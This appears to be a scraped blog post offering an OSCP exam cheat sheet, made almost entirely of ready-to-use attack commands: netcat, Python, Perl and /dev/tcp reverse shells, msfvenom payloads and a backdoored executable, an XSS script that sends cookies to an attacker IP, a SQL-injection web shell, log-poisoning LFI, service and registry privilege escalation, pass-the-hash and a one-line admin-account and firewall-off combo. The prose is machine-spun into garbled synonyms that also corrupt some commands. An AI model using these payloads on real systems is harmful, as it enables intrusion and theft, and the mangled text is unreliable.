-->
Go-For-Oscp

Go-For-Oscp

Go-For-Oscp

I desire to portion a twosome of things that I intend helped me preparing the Offensive Security Certified Professional - OSCP certification together with what I establish useful during the labs together with exam. If you lot have got whatever questions, experience gratis to contact me.
Don't forget to:
  • Follow the courseware offset together with therefore start practicing inwards the labs.
  • Use additional sources to larn more.
  • Join the offensive safety PWK forums together with social media together with speak to other people.

Tips

Enable service on every reboot:
update-rc.d <[SERVICE]> enable 
Extract link from html page:
cat index.html | grep "href=" | cutting -d "/" -f3| grep "<[DOMAIN]>" | cutting -d '"' -f1 | form -u 

Netcat

Interact alongside application:
nc -nv <[IP]> <[PORT]> 
Listener:
nc -nlvp <[PORT]> 
File transfer (client):
nc -nlvp <[PORT]> > <[FILE]> 
File transfer (server):
nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]> 

Bind vs Reverse Shell


Bind Shell:
Bob needs Alice's help. Bob laid a listener on port 4444 alongside -e parameter:
(BOB): nc -nlvp <[PORT]> -e cmd.exe  (ALICE): nc -nv <[BOB_IP]> <[PORT]> 
Reverse Shell:
Alice needs Bob's help. Since Alice is beyond firewall it is impossible to BOB to accomplish Alice. So Alice practise a contrary shell:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash  (BOB): nc -nlvp <[PORT]> 

Zone Transfer

dnsrecon -t axfr -d <[DOMAIN]> 

Nmap

nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]> 

SMB

nbtscan <[SUBNET]>  nmap -p139,445 --script smb-enum-users <[SUBNET]>  nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>  enum4linux  smbclient -L <[IP]> -N  smbclient \\<[IP]>\share -N 

SMTP

nmap -p25 <[SUBNET]> --open  nc -nv IP 25  VRFY <[USERNAME]> 

SNMP

Steps: nmap scan udp 161, practise target IP list, practise community listing file, purpose onesixtyone + snmpwalk
nmap -sU --open -p161 <[SUBNET]> --open  onesixtyone -c community -i <[SMNP_IP_LIST]>  snmpwalk -c world -v1 <[IP]> <mib-values> 
Mib-values (for snmpwalk):
1.3.6.1.2.1.25.1.6.0 System Processes  1.3.6.1.2.1.25.4.2.1.2 Running Programs  1.3.6.1.2.1.25.4.2.1.4 Processes Path  1.3.6.1.2.1.25.2.3.1.4 Storage Units  1.3.6.1.2.1.25.6.3.1.2 Software Name  1.3.6.1.4.1.77.1.2.25 User  1.3.6.1.2.1.6.13.1.3 TCP Local Ports 

File Transfer Linux

Netcat:
On Victim machine (client):  nc -nlvp 4444 > <[FILE]>  On Attacker machine (server):  nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]> 
Curl:
curl -O http://<[IP]>/<[FILE]> 
Wget:
wget http://<[IP]>/<[FILE]> 
Recursive wget ftp download:
wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]> 

File Transfer Windows

TFTP (Installed past times default upwardly to Windows XP together with 2003, In Windows 7, 2008 together with inwards a higher identify needs to endure explicitly added. For this argue tftp non ideal file transfer protocol inwards near situations.)
On assaulter machine:  mkdir tftp  atftpd --deamon --port 69 tftp  cp <[FILE]> tftp  On victim machine shell:  tftp -i <[IP]> GET <[FILE]> 
FTP (Windows operating systems comprise a default FTP customer that tin also endure used for file transfer)
On assaulter machine:
(UNA TANTUM) Install a ftp server. apt-get install pure-ftpd  (UNA TANTUM) Create novel user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234)   groupadd ftgroup   useradd -g ftpgroup -d /dev/null -s /etc ftpuser   pure-pw useradd present -u ftpuser -d /ftphome   pure-pw mkdb   cd /etc/pure-ftpd/auth   ln -s ../conf/PureDB 60pdb   mkdir -p /ftphome   chown -R ftpuser:ftpgroup /ftphome   /etc/init.d/pure-ftpd restart  (UNA TANTUM) chmod 755 setup-ftp.sh 
On victim machine shell:
echo opened upwardly <[IP]> 21 > ftp.txt  echo USER present >> ftp.txt  echo ftp >> ftp.txt  echo bin >> ftp.txt  echo GET nc.exe >> ftp.txt  echo goodbye >> ftp.txt  ftp -v -n -s:ftp.txt 
VBScript (in Windows XP, 2003)
On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs &  echo StrFile = WScript.Arguments.Item(1) >> wget.vbs &  echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs &  echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs &  echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs &  echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs &  echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs &  echo Err.Clear >> wget.vbs &  echo Set http = Nothing >> wget.vbs &  echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs &  echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs &  echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs &  echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs &  echo http.Open "GET", strURL, False >> wget.vbs &  echo http.Send >> wget.vbs &  echo varByteArray = http.ResponseBody >> wget.vbs &  echo Set http = Nothing >> wget.vbs &  echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs &  echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs &  echo strData = "" >> wget.vbs &  echo strBuffer = "" >> wget.vbs &  echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs &  echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs &  echo Next >> wget.vbs &  echo ts.Close >> wget.vbs  cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]> 
Powershell (In Windows 7, 2008 together with above)
On victim machine shell:
echo $storageDir = $pwd > wget.ps1  echo $webclient = New-Object System.Net.WebClient >> wget.ps1  echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1  echo $file = "evil.exe" >> wget.ps1  echo $webclient.DownloadFile($url,$file) >> wget.ps1  powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 
Debug.exe utility (In Windows 32bit OS - Works solely for file < 64Kb)
On assaulter machine:
cp <[FILE]> .  upx -9 <[FILE]> (for compression)  cp /usr/share/windows-binaries/exe2bat.exe .  vino exe2bat <[FILE]> <[FILE.txt]> 
On victim machine:
Paste the content of <[FILE.txt]> 

XSS

Stole cookie from xss:
On assaulter machine laid listener (nc -nlvp <[PORT]>)  On victim website <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script> 

LFI/RFI

Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) together with mail <?php echo shell_exec($_GET['cmd']);?>, afterward that stimulate to include log file for code execution.  &cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log 

SQL Injection

Bse:
any' or 1=1 boundary 1;--  
Number of columns:
order past times 1, lodge past times 2, ... 
Expose information from database:
UNION conduct 1,2,3,4,5,6 
Enum tables:
UNION conduct 1,2,3,4,table_name,6 FROM information_schema.tables 
Shell upload:
<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 marriage ceremony conduct 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php' 

Buffer Overflow

/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>  /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]> 

Privilege Escalation

Vulnerable Services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  sc qc <[VULNERABLE_SERVICE]>  sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""  sc config <[VULNERABLE_SERVICE]> start= "auto"  sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"  sc halt <[VULNERABLE_SERVICE]>  sc start <[VULNERABLE_SERVICE]>  sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add"  sc halt <[VULNERABLE_SERVICE]>  sc start <[VULNERABLE_SERVICE]>  sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"  sc halt <[VULNERABLE_SERVICE]>  sc start <[VULNERABLE_SERVICE]> 
Win10:
reg.exe add together "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f   Then ctrl+alt+canc together with start virtual keyboard 

Pass the hash

Export SMBHASH=<[HASH]>  pth-winexe -U administrator% //<[IP]> cmd 

Cracking

Medusa
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND" 
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]> 

Firewall

Enable Remote Desktop:
reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f  netsh firewall laid service remotedesktop enable 
Enable Remote assistance:
reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f  netsh firewall laid service remoteadmin enable 
Disable firewall:
netsh firewall set opmode disable 
One shot ninja combo (New Admin User, Firewall Off + RDP):
set CMD "net user hacker Hacker123 /add & internet localgroup administrators hacker /add & internet localgroup \"Remote Desktop Users\"  hacker /add & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable" 

Backdooring EXE Files

msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i three -b "\x00" -f exe -o <[FILE_NAME]> 

Binaries payloads

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]> 
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]> 
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]> 

Web payloads

PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]> truthful cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]> 
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]> 
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]> 
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f nation of war > <[FILE_NAME.war]> 

Scripting Payloads

Python:
msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]> 
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]> 
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]> 

Shellcode

For all shellcode encounter ‘msfvenom –help-formats’ for information every bit to valid parameters. Msfvenom volition output code that is able to endure cutting together with pasted inwards this linguistic communication for your exploits.
Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 
Windows Based Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 
Mac Based Shellcode:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 

Staged vs Non-Staged Payloads

Staged payload: (useful for bof) (need multi_handler metasploit inwards lodge to works)
Windows/shell/reverse_tcp  msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]> 
Non-staged: (ok alongside netcat listener)
Windows/shell_reverse_tcp  msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]> 

Handlers

Metasploit handlers tin endure great at chop-chop setting upwardly Metasploit to endure inwards a seat to have your incoming shells. Handlers should endure inwards the next format.
use exploit/multi/handler  laid PAYLOAD <[PAYLOAD_NAME]>  laid LHOST <[IP]>  laid LPORT <[PORT]>  laid ExitOnSession imitation  exploit -j -z 

Shell Spawning

Python:
python -c 'import pty; pty.spawn("/bin/sh")'  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 
Bash:
echo os.system('/bin/bash')  /bin/sh -i  exec 5<>/dev/tcp/<[IP]>/<[PORT]> truthful cat <&5 | spell read line; practise $line 2>&5 >&5; done 
Perl:
perl —e 'exec "/bin/sh";'  perl: exec "/bin/sh";  perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
Telnet:
mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy 
Ruby:
ruby: exec "/bin/sh" 
Lua:
lua: os.execute('/bin/sh') 
From inside IRB:
exec "/bin/sh" 
From inside vi:
:!bash 
From inside vi:
:set shell=/bin/bash:shell 
From inside nmap:
!sh 
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser